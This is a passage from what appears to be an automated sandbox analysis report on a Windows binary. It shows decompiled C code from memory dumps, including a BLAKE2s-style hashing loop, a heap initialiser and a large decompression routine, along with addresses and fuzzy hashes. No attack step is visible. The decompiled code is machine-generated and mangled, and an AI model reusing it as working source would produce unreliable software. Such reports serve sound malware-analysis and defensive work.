				 *((intOrPtr*)(_t364 + 0x14)) = 0;
				 *(_t364 + 0x30) =  *(_t364 + 0x70);
				 *(_t364 + 0x10) = _t272;
				do {
					_t27 = _t335 + 0xcf36c0; // 0x3020100
					_t31 = _t364 + 0x18; // 0x6a09e667
					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
					_t297 = _t320 ^ _t258;
					_t259 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t274 =  *_t31 + _t297;
					_t337 = _t274 ^  *(_t364 + 0x10);
					asm("ror esi, 0xc");
					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c1) & 0x000000ff) * 4)) + _t337 + _t320;
					 *(_t364 + 0x18) = _t200;
					_t201 = _t200 ^ _t297;
					asm("ror eax, 0x8");
					 *(_t364 + 0x3c) = _t201;
					_t202 = _t201 + _t274;
					 *(_t364 + 0x48) = _t202;
					asm("ror eax, 0x7");
					 *(_t364 + 0x50) = _t202 ^ _t337;
					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
					_t299 = _t323 ^ _t352;
					_t353 =  *(_t364 + 0x38);
					asm("rol edx, 0x10");
					_t276 =  *(_t364 + 0x24) + _t299;
					_t339 = _t276 ^  *(_t364 + 0x30);
					asm("ror esi, 0xc");
					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c3) & 0x000000ff) * 4)) + _t339 + _t323;
					 *(_t364 + 0x10) = _t208;
					_t209 = _t208 ^ _t299;
					asm("ror eax, 0x8");
					 *(_t364 + 0x44) = _t209;
					_t210 = _t209 + _t276;
					 *(_t364 + 0x58) = _t210;
					asm("ror eax, 0x7");
					 *(_t364 + 0x24) = _t210 ^ _t339;
					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
					_t301 = _t342 ^  *(_t364 + 0x20);
					asm("rol edx, 0x10");
					_t278 =  *(_t364 + 0x2c) + _t301;
					_t354 = _t353 ^ _t278;
					asm("ror ebp, 0xc");
					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c5) & 0x000000ff) * 4)) + _t354 + _t342;
					 *(_t364 + 0x40) = _t216;
					_t217 = _t216 ^ _t301;
					asm("ror eax, 0x8");
					 *(_t364 + 0x54) = _t217;
					_t260 = _t217 + _t278;
					_t355 =  *((intOrPtr*)(_t364 + 0x14));
					asm("ror eax, 0x7");
					 *(_t364 + 0x20) = _t260 ^ _t354;
					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xcf36c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
					_t303 = _t326 ^  *(_t364 + 0x28);
					asm("rol edx, 0x10");
					_t280 =  *(_t364 + 0x34) + _t303;
					_t344 = _t280 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xcf36c7) & 0x000000ff) * 4)) + _t344 + _t326;
					 *(_t364 + 0x4c) = _t224;
					_t328 = _t224 ^ _t303;
					asm("ror edi, 0x8");
					_t356 = _t328 + _t280;
					asm("ror eax, 0x7");
					 *(_t364 + 0x1c) = _t356 ^ _t344;
					_t98 = _t364 + 0x18; // 0x6a09e667
					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0xcf36c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
					_t305 = _t283 ^ _t328;
					_t329 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t345 = _t305 + _t260;
					_t262 = _t345 ^  *(_t364 + 0x24);
					asm("ror ebx, 0xc");
					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36c9) & 0x000000ff) * 4)) + _t262 + _t283;
					 *(_t364 + 0x5c) = _t232;
					_t233 = _t232 ^ _t305;
					asm("ror eax, 0x8");
					 *(_t364 + 0x28) = _t233;
					 *(_t364 + 0x98) = _t233;
					_t234 = _t233 + _t345;
					_t263 = _t262 ^ _t234;
					 *(_t364 + 0x2c) = _t234;
					 *(_t364 + 0x84) = _t234;
					asm("ror ebx, 0x7");
					 *(_t364 + 0x30) = _t263;
					 *(_t364 + 0x70) = _t263;
					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
					_t265 = _t286 ^  *(_t364 + 0x3c);
					asm("rol ebx, 0x10");
					_t306 = _t265 + _t356;
					_t358 = _t306 ^  *(_t364 + 0x20);
					asm("ror ebp, 0xc");
					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36cb) & 0x000000ff) * 4)) + _t358 + _t286;
					_t258 = _t265 ^ _t239;
					 *(_t364 + 0x60) = _t239;
					asm("ror ebx, 0x8");
					_t240 = _t306 + _t258;
					_t359 = _t358 ^ _t240;
					 *(_t364 + 0x34) = _t240;
					 *(_t364 + 0x88) = _t240;
					asm("ror ebp, 0x7");
					 *(_t364 + 0x38) = _t359;
					 *(_t364 + 0x74) = _t359;
					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
					_t361 = _t289 ^  *(_t364 + 0x44);
					asm("rol ebp, 0x10");
					_t308 =  *(_t364 + 0x48) + _t361;
					_t347 = _t308 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36cd) & 0x000000ff) * 4)) + _t347 + _t289;
					_t352 = _t361 ^ _t245;
					 *(_t364 + 0x64) = _t245;
					asm("ror ebp, 0x8");
					_t246 = _t308 + _t352;
					_t348 = _t347 ^ _t246;
					 *(_t364 + 0x18) = _t246;
					 *(_t364 + 0x7c) = _t246;
					asm("ror esi, 0x7");
					 *(_t364 + 0x1c) = _t348;
					 *(_t364 + 0x78) = _t348;
					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
					_t349 =  *((intOrPtr*)(_t364 + 0x14));
					_t331 = _t292 ^  *(_t364 + 0x54);
					asm("rol edi, 0x10");
					_t310 =  *(_t364 + 0x58) + _t331;
					asm("ror eax, 0xc");
					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
					_t335 = _t349 + 0x10;
					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0xcf36cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
					_t332 = _t331 ^ _t253;
					 *(_t364 + 0x68) = _t253;
					asm("ror edi, 0x8");
					 *(_t364 + 0x20) = _t332;
					 *(_t364 + 0x94) = _t332;
					_t254 = _t310 + _t332;
					_t272 =  *(_t364 + 0x10) ^ _t254;
					 *(_t364 + 0x24) = _t254;
					asm("ror ecx, 0x7");
					 *(_t364 + 0x80) = _t254;
					 *(_t364 + 0x10) = _t272;
					 *(_t364 + 0x6c) = _t272;
				} while (_t335 <= 0x90);
				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
				_t311 = 0;
				 *(_t364 + 0x8c) = _t258;
				 *(_t364 + 0x90) = _t352;
				do {
					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
					_t311 = _t311 + 4;
				} while (_t311 < 0x20);
				return _t256;
			}














































































                                                    0x00cc4104
                                                    0x00cc410e
                                                    0x00cc412a
                                                    0x00cc4136
                                                    0x00cc413c
                                                    0x00cc413d
                                                    0x00cc413d
                                                    0x00cc4149
                                                    0x00cc414c
                                                    0x00cc414c
                                                    0x00cc415e
                                                    0x00cc4162
                                                    0x00cc4166
                                                    0x00cc4168
                                                    0x00cc4170
                                                    0x00cc4178
                                                    0x00cc4180
                                                    0x00cc4188
                                                    0x00cc4190
                                                    0x00cc4198
                                                    0x00cc41a0
                                                    0x00cc41a4
                                                    0x00cc41a8
                                                    0x00cc41ac
                                                    0x00cc41ac
                                                    0x00cc41bc
                                                    0x00cc41c0
                                                    0x00cc41c6
                                                    0x00cc41c8
                                                    0x00cc41cc
                                                    0x00cc41cf
                                                    0x00cc41d3
                                                    0x00cc41de
                                                    0x00cc41ea
                                                    0x00cc41ec
                                                    0x00cc41f0
                                                    0x00cc41f2
                                                    0x00cc41f5
                                                    0x00cc41f9
                                                    0x00cc41fb
                                                    0x00cc4201
                                                    0x00cc4204
                                                    0x00cc421e
                                                    0x00cc422b
                                                    0x00cc422d
                                                    0x00cc4231
                                                    0x00cc4234
                                                    0x00cc423f
                                                    0x00cc4243
                                                    0x00cc4248
                                                    0x00cc424a
                                                    0x00cc424e
                                                    0x00cc4250
                                                    0x00cc4253
                                                    0x00cc4257
                                                    0x00cc4259
                                                    0x00cc4263
                                                    0x00cc4266
                                                    0x00cc4281
                                                    0x00cc4287
                                                    0x00cc4292
                                                    0x00cc4295
                                                    0x00cc4297
                                                    0x00cc4299
                                                    0x00cc429e
                                                    0x00cc42a0
                                                    0x00cc42a4
                                                    0x00cc42a6
                                                    0x00cc42a9
                                                    0x00cc42ad
                                                    0x00cc42b4
                                                    0x00cc42b8
                                                    0x00cc42bb
                                                    0x00cc42d1
                                                    0x00cc42de
                                                    0x00cc42e6
                                                    0x00cc42f0
                                                    0x00cc42f4
                                                    0x00cc42f8
                                                    0x00cc42fd
                                                    0x00cc4301
                                                    0x00cc4305
                                                    0x00cc4307
                                                    0x00cc430a
                                                    0x00cc4311
                                                    0x00cc4314
                                                    0x00cc432e
                                                    0x00cc432e
                                                    0x00cc4334
                                                    0x00cc4336
                                                    0x00cc433a
                                                    0x00cc4344
                                                    0x00cc4349
                                                    0x00cc4354
                                                    0x00cc4359
                                                    0x00cc435b
                                                    0x00cc435f
                                                    0x00cc4361
                                                    0x00cc4364
                                                    0x00cc4368
                                                    0x00cc436f
                                                    0x00cc4371
                                                    0x00cc4373
                                                    0x00cc4377
                                                    0x00cc4385
                                                    0x00cc4388
                                                    0x00cc438c
                                                    0x00cc439b
                                                    0x00cc43a8
                                                    0x00cc43ac
                                                    0x00cc43b6
                                                    0x00cc43bb
                                                    0x00cc43bf
                                                    0x00cc43c4
                                                    0x00cc43c6
                                                    0x00cc43c8
                                                    0x00cc43cc
                                                    0x00cc43cf
                                                    0x00cc43d2
                                                    0x00cc43d4
                                                    0x00cc43d8
                                                    0x00cc43e6
                                                    0x00cc43e9
                                                    0x00cc43ed
                                                    0x00cc43fc
                                                    0x00cc4402
                                                    0x00cc4411
                                                    0x00cc4414
                                                    0x00cc441f
                                                    0x00cc4423
                                                    0x00cc4428
                                                    0x00cc442a
                                                    0x00cc442c
                                                    0x00cc4430
                                                    0x00cc4433
                                                    0x00cc443a
                                                    0x00cc443c
                                                    0x00cc4440
                                                    0x00cc444b
                                                    0x00cc444e
                                                    0x00cc4452
                                                    0x00cc4461
                                                    0x00cc4465
                                                    0x00cc446b
                                                    0x00cc446f
                                                    0x00cc4472
                                                    0x00cc447a
                                                    0x00cc447d
                                                    0x00cc4488
                                                    0x00cc448b
                                                    0x00cc449a
                                                    0x00cc44a0
                                                    0x00cc44a2
                                                    0x00cc44a6
                                                    0x00cc44a9
                                                    0x00cc44ad
                                                    0x00cc44b4
                                                    0x00cc44b7
                                                    0x00cc44b9
                                                    0x00cc44bd
                                                    0x00cc44c0
                                                    0x00cc44c7
                                                    0x00cc44cb
                                                    0x00cc44cf
                                                    0x00cc44db
                                                    0x00cc44e2
                                                    0x00cc44e4
                                                    0x00cc44eb
                                                    0x00cc44f2
                                                    0x00cc44fc
                                                    0x00cc4500
                                                    0x00cc4503
                                                    0x00cc4506
                                                    0x00cc4515

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gj
                                                    • API String ID: 0-4203073231
                                                    • Opcode ID: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                    • Instruction ID: 39a2e00acb3e5a61890bda591f7188c1e9de8ea5b1207a5729ef8bdd1c913831
                                                    • Opcode Fuzzy Hash: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                    • Instruction Fuzzy Hash: D4C13676A183818FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E945CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CEC030() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xd226e4 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                    0x00cec030
                                                    0x00cec038
                                                    0x00cec040

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                    • Instruction ID: 78d51fb1f0f409f87f5c6f2f30d8997644efc37af6cb556811808d24b56f4975
                                                    • Opcode Fuzzy Hash: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                    • Instruction Fuzzy Hash: F1A02230203300FFC300CF30AF0CB2C3BE8AA283E2308802AB008C0230EB3080A0EB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD62CA Relevance: .8, Instructions: 829COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E00CD62CA(intOrPtr __esi) {
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				signed int _t361;
				intOrPtr _t363;
				signed int _t372;
				char _t381;
				void* _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t389;
				signed int _t399;
				char _t408;
				unsigned int _t409;
				void* _t417;
				signed int _t418;
				signed int _t419;
				intOrPtr _t421;
				signed int _t424;
				char _t433;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed short _t449;
				signed int _t450;
				signed int _t454;
				unsigned int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t468;
				signed int _t469;
				signed short _t470;
				unsigned int _t475;
				signed int _t480;
				unsigned int _t482;
				signed int _t496;
				signed int _t499;
				signed int _t501;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				intOrPtr* _t512;
				intOrPtr* _t513;
				signed int _t514;
				intOrPtr* _t515;
				signed int _t516;
				signed int _t522;
				signed int _t524;
				signed int* _t525;
				intOrPtr _t526;
				void* _t529;
				signed int _t532;
				signed int* _t535;
				unsigned int _t538;
				signed int _t539;
				void* _t540;
				signed int _t543;
				signed int _t545;
				signed int _t548;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t559;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t565;
				signed int _t568;
				unsigned int _t575;
				signed int _t576;
				void* _t577;
				signed int _t580;
				void* _t583;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				void* _t593;
				signed int _t596;
				intOrPtr* _t598;
				void* _t599;
				signed int _t602;
				void* _t605;
				signed int _t609;
				signed int _t610;
				intOrPtr* _t612;
				void* _t613;
				void* _t616;
				signed int _t619;
				intOrPtr* _t625;
				void* _t626;
				unsigned int _t633;
				signed int _t636;
				signed int _t637;
				unsigned int _t639;
				signed int _t642;
				void* _t645;
				signed int _t646;
				void* _t649;
				signed int _t650;
				signed int _t651;
				void* _t654;
				unsigned int _t656;
				unsigned int _t660;
				signed int _t663;
				signed int _t665;
				unsigned int _t666;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed short _t672;
				signed int _t673;
				signed int _t674;
				unsigned int _t678;
				signed int _t680;
				intOrPtr _t684;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int* _t689;
				char* _t692;
				char* _t693;
				signed int _t696;
				void* _t697;
				void* _t700;

				L0:
				while(1) {
					L0:
					_t684 = __esi;
					_t525 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
							goto L11;
						} else {
							_t513 = _t684 + 0x8c;
							goto L3;
						}
						while(1) {
							L3:
							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t684 + 0x9c)) != 0) {
								L97:
								_t360 = E00CD5202(_t684);
								L98:
								return _t360;
							}
							L7:
							_push(_t513);
							_push(_t689);
							_t360 = E00CD3E0B(_t684);
							if(_t360 == 0) {
								goto L98;
							}
							L8:
							_push(_t684 + 0xa0);
							_push(_t513);
							_push(_t689);
							_t360 = E00CD43BF(_t684);
							if(_t360 != 0) {
								continue;
							} else {
								goto L98;
							}
						}
						L10:
						_t496 = E00CD4E52(_t684);
						__eflags = _t496;
						if(_t496 == 0) {
							goto L97;
						}
						L11:
						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
							L17:
							_t344 = E00CCA89D(_t689);
							_t345 =  *(_t684 + 0x124);
							_t633 = _t344 & 0x0000fffe;
							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
								L19:
								_t671 = 0xf;
								_t346 = _t345 + 1;
								__eflags = _t346 - _t671;
								if(_t346 >= _t671) {
									L25:
									_t499 = _t689[1] + _t671;
									_t348 = _t499 >> 3;
									 *_t689 =  *_t689 + _t348;
									 *(_t697 + 0x10) =  *_t689;
									_t689[1] = _t499 & 0x00000007;
									_t529 = 0x10;
									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
									asm("sbb eax, eax");
									_t349 = _t348 & _t532;
									__eflags = _t349;
									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
									_t350 =  *(_t697 + 0x10);
									goto L26;
								} else {
									_t625 = _t684 + (_t346 + 0x29) * 4;
									while(1) {
										L21:
										__eflags = _t633 -  *_t625;
										if(_t633 <  *_t625) {
											_t671 = _t346;
											goto L25;
										}
										L22:
										_t346 = _t346 + 1;
										_t625 = _t625 + 4;
										__eflags = _t346 - 0xf;
										if(_t346 < 0xf) {
											continue;
										} else {
											goto L25;
										}
									}
									goto L25;
								}
							} else {
								_t626 = 0x10;
								_t670 = _t633 >> _t626 - _t345;
								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
								 *_t689 =  *_t689 + (_t508 >> 3);
								_t504 = _t508 & 0x00000007;
								_t350 =  *_t689;
								_t689[1] = _t504;
								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
								 *(_t697 + 0x10) = _t350;
								L26:
								_t636 = _t672 & 0x0000ffff;
								__eflags = _t636 - 0x100;
								if(_t636 >= 0x100) {
									L30:
									__eflags = _t636 - 0x106;
									if(_t636 < 0x106) {
										L94:
										__eflags = _t636 - 0x100;
										if(_t636 != 0x100) {
											L100:
											__eflags = _t636 - 0x101;
											if(_t636 != 0x101) {
												L125:
												_t637 = _t636 + 0xfffffefe;
												__eflags = _t637;
												_t535 = _t684 + (_t637 + 0x18) * 4;
												_t501 =  *_t535;
												 *(_t697 + 0x18) = _t501;
												if(_t637 == 0) {
													L127:
													 *(_t684 + 0x60) = _t501;
													_t351 = E00CCA89D(_t689);
													_t352 =  *(_t684 + 0x2de8);
													_t639 = _t351 & 0x0000fffe;
													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
														L129:
														_t673 = 0xf;
														_t353 = _t352 + 1;
														__eflags = _t353 - _t673;
														if(_t353 >= _t673) {
															L135:
															_t538 = _t689[1] + _t673;
															_t539 = _t538 & 0x00000007;
															_t689[1] = _t539;
															_t355 = _t538 >> 3;
															 *_t689 =  *_t689 + _t355;
															 *(_t697 + 0x20) = _t539;
															_t540 = 0x10;
															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
															asm("sbb eax, eax");
															_t356 = _t355 & _t543;
															__eflags = _t356;
															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
															L136:
															_t674 = _t357 & 0x0000ffff;
															__eflags = _t674 - 8;
															if(_t674 >= 8) {
																_t504 = (_t674 >> 2) - 1;
																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
																__eflags = _t504;
																if(_t504 != 0) {
																	_t409 = E00CCA89D(_t689);
																	_t556 = 0x10;
																	_t678 = _t678 + (_t409 >> _t556 - _t504);
																	_t559 =  *(_t697 + 0x20) + _t504;
																	 *_t689 =  *_t689 + (_t559 >> 3);
																	_t560 = _t559 & 0x00000007;
																	__eflags = _t560;
																	_t689[1] = _t560;
																}
															} else {
																_t678 = _t674 + 2;
															}
															__eflags =  *((char*)(_t684 + 0x4c44));
															_t545 =  *(_t697 + 0x18);
															 *(_t684 + 0x74) = _t678;
															if( *((char*)(_t684 + 0x4c44)) == 0) {
																L142:
																_t642 =  *(_t684 + 0x7c);
																_t506 = _t642 - _t545;
																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t506 - _t359;
																if(_t506 >= _t359) {
																	goto L152;
																}
																L143:
																__eflags = _t642 - _t359;
																if(_t642 >= _t359) {
																	goto L152;
																}
																L144:
																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
																_t512 = _t506 + _t363;
																_t692 = _t642 + _t363;
																_t645 = 8;
																 *(_t684 + 0x7c) = _t642 + _t678;
																__eflags = _t678 - _t645;
																if(_t678 < _t645) {
																	L114:
																	_t525 = _t684 + 0x7c;
																	__eflags = _t678;
																	if(_t678 == 0) {
																		L89:
																		_t689 = _t684 + 4;
																		continue;
																	}
																	L115:
																	_t525 = _t684 + 0x7c;
																	 *_t692 =  *_t512;
																	__eflags = _t678 - 1;
																	if(_t678 <= 1) {
																		goto L89;
																	}
																	L116:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	__eflags = _t678 - 2;
																	if(_t678 <= 2) {
																		goto L89;
																	}
																	L117:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	__eflags = _t678 - 3;
																	if(_t678 <= 3) {
																		goto L89;
																	}
																	L118:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	__eflags = _t678 - 4;
																	if(_t678 <= 4) {
																		goto L89;
																	}
																	L119:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	__eflags = _t678 - 5;
																	if(_t678 <= 5) {
																		goto L89;
																	}
																	L120:
																	_t525 = _t684 + 0x7c;
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	__eflags = _t678 - 6;
																	if(_t678 <= 6) {
																		goto L89;
																	}
																	L121:
																	_t360 =  *((intOrPtr*)(_t512 + 6));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	goto L155;
																}
																L145:
																__eflags = _t545 - _t678;
																if(_t545 >= _t678) {
																	L149:
																	_t372 = _t678 >> 3;
																	__eflags = _t372;
																	 *(_t697 + 0x20) = _t372;
																	_t686 = _t372;
																	do {
																		L150:
																		E00CE0320(_t692, _t512, _t645);
																		_t697 = _t697 + 0xc;
																		_t645 = 8;
																		_t512 = _t512 + _t645;
																		_t692 = _t692 + _t645;
																		_t678 = _t678 - _t645;
																		_t686 = _t686 - 1;
																		__eflags = _t686;
																	} while (_t686 != 0);
																	L113:
																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
																	goto L114;
																}
																L146:
																_t548 = _t678 >> 3;
																__eflags = _t548;
																do {
																	L147:
																	_t678 = _t678 - _t645;
																	 *_t692 =  *_t512;
																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
																	_t381 =  *((intOrPtr*)(_t512 + 7));
																	_t512 = _t512 + _t645;
																	 *((char*)(_t692 + 7)) = _t381;
																	_t692 = _t692 + _t645;
																	_t548 = _t548 - 1;
																	__eflags = _t548;
																} while (_t548 != 0);
																goto L114;
															} else {
																L141:
																_push( *(_t684 + 0xe6dc));
																_push(_t684 + 0x7c);
																_push(_t545);
																L70:
																_push(_t678);
																E00CD2C30();
																while(1) {
																	L0:
																	_t684 = __esi;
																	_t525 = __esi + 0x7c;
																	do {
																		do {
																			goto L3;
																			L152:
																			_t525 = _t684 + 0x7c;
																			__eflags = _t678;
																		} while (_t678 == 0);
																		_t360 =  *(_t684 + 0xe6dc);
																		do {
																			L154:
																			_t361 = _t360 & _t506;
																			_t506 = _t506 + 1;
																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
																			_t360 =  *(_t684 + 0xe6dc);
																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
																			 *(_t684 + 0x7c) = _t642;
																			_t678 = _t678 - 1;
																			__eflags = _t678;
																		} while (_t678 != 0);
																		L155:
																		goto L0;
																		do {
																			while(1) {
																				L0:
																				_t684 = __esi;
																				_t525 = __esi + 0x7c;
																				L1:
																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
																					goto L11;
																				} else {
																					_t513 = _t684 + 0x8c;
																					goto L3;
																				}
																			}
																			L96:
																			_t438 = E00CD253E(_t684, _t697 + 0x28);
																			__eflags = _t438;
																		} while (_t438 != 0);
